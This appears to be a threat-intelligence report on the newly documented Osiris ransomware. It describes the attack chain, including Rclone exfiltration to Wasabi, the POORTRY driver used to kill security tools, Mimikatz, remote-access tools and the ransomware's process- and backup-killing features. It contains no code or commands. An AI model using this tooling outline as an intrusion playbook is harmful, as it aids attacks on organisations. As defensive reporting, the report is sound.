Osiris Ransomware Family

Cybersecurity researchers have revealed a previously undocumented ransomware family dubbed Osiris, following an attack against a major food service franchise operator in Southeast Asia in November 2025. Analysis indicates that this is a newly developed ransomware strain and not related to the Osiris variant observed in December 2016 that was derived from Locky. The identity of the developers remains unknown, and there is no confirmation that the malware is offered as part of a Ransomware-as-a-Service operation.

Attack Chain and Initial Compromise

The earliest confirmed malicious activity on the victim network involved the exfiltration of sensitive data prior to ransomware deployment. Attackers transferred information using Rclone to cloud storage buckets hosted on Wasabi. This phase was followed by the staged introduction of tooling to establish control, move laterally, and prepare the environment for encryption.

A variety of living-off-the-land and dual-use utilities were leveraged, along with remote management components, to blend into normal administrative activity and minimize early detection.

Suspected Links to INC Ransomware Operations

Several indicators suggest potential overlap with actors previously associated with the INC ransomware (also known as Warble). Notably, the attackers used a version of Mimikatz bearing the same filename, kaz.exe, which has been observed in earlier INC-related incidents. Additionally, the exfiltration infrastructure and tradecraft closely mirror techniques previously attributed to that ecosystem, although no definitive attribution has been established.

The POORTRY Driver and BYOVD Tactics

A central feature of the intrusion was the deployment of a malicious driver known as POORTRY, used in a bring-your-own-vulnerable-driver (BYOVD) style attack to neutralize endpoint defenses. Unlike traditional BYOVD operations that rely on legitimate but flawed drivers, POORTRY is a bespoke driver engineered specifically to elevate privileges and terminate security tools.

The environment was further prepared using KillAV, a known utility for loading vulnerable drivers to disable protective software. Remote Desktop Protocol was also enabled, likely to facilitate persistent interactive access.

Capabilities of the Osiris Ransomware

Osiris has been described as a mature and effective encryption payload, likely operated by experienced threat actors. It implements a hybrid cryptographic model and generates a unique encryption key for each file, significantly complicating recovery efforts. The ransomware supports extensive configuration, allowing operators to fine-tune execution to the victim environment.

Key functional features include:

• Stopping services, terminating processes, and disabling backups or recovery mechanisms.
• Defining targeted folders and file extensions, and generating a customized ransom note upon completion.

By default, Osiris is configured to aggressively terminate processes and services associated with productivity software, email servers, browsers, text editors, Volume Shadow Copy, and enterprise backup platforms such as Veeam.

Tooling Used to Support the Intrusion

Beyond the ransomware itself, the attackers relied on a toolkit of reconnaissance, lateral movement, and remote management utilities to maintain operational control. Tools observed during the intrusion included:

• Netscan and Netexec for network discovery and execution.
• MeshAgent and a customized build of the Rustdesk remote desktop application for persistent remote access.
• Rclone for automated data exfiltration to cloud storage.

Implications for the Evolving Extortion Landscape

While encrypting ransomware continues to pose a significant risk to organizations, this incident highlights a broader evolution toward multi-faceted extortion campaigns. The increasing emphasis on data theft, defense evasion through malicious drivers, and the growing prevalence of encryptionless or hybrid attacks are expanding the threat landscape. As a result, ransomware is becoming just one component within a wider, more complex extortion ecosystem that demands equally adaptive defensive strategies.